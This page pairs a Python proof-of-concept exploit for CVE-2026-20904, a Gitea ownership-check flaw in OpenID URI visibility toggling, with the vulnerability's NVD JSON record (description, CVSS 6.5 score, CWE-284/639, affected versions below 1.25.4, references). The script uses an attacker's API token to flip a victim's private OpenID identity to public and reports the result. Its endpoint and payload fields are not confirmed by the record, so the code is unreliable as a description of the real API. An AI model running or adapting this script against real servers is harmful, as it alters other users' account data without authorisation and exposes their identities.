CVE-2026-20904

import requests import json # CVE-2026-20904 PoC - Gitea OpenID URI Visibility Manipulation # Target: Gitea < 1.25.4 TARGET_URL = "http://target-gitea.com" ATTACKER_TOKEN = "your_attacker_token_here" TARGET_USER_ID = 123 # Victim user ID TARGET_OPENID_ID = 456 # Victim's OpenID identity ID def exploit_visibility_toggle(): """ Exploit for CVE-2026-20904: Gitea OpenID URI visibility bypass Allows authenticated user to change visibility of other users' OpenID identities """ endpoint = f"{TARGET_URL}/api/v1/user/settings/openid" headers = { "Authorization": f"token {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Malicious payload - changing visibility of victim's OpenID URI payload = { "user_id": TARGET_USER_ID, # Point to victim "openid_id": TARGET_OPENID_ID, "visibility": "public" # Change to public (was private) } try: response = requests.post(endpoint, headers=headers, json=payload, timeout=10) if response.status_code == 200: print("[+] SUCCESS: OpenID visibility changed to public") print(f"[+] Target OpenID ID: {TARGET_OPENID_ID} is now visible") return True else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] ERROR: {e}") return False if __name__ == "__main__": exploit_visibility_toggle()

{"cve": {"id": "CVE-2026-20904", "sourceIdentifier": "88ee5874-cf24-4952-aea0-31affedb7ff2", "published": "2026-01-22T22:16:19.130", "lastModified": "2026-01-29T22:03:08.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea does not properly validate ownership when toggling OpenID URI visibility. An authenticated user may be able to change the visibility settings of other users' OpenID identities."}, {"lang": "es", "value": "Gitea no valida correctamente la titularidad al alternar la visibilidad de la URI de OpenID. Un usuario autenticado podría cambiar la configuración de visibilidad de las identidades OpenID de otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.25.4", "matchCriteriaId": "DFCB7D74-331D-4582-AB41-113A25BE8FAA"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.25.4/", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/36346", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/pull/36361", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.25.4", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-jrpc-w85r-hgqx", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Broken Link"]}]}}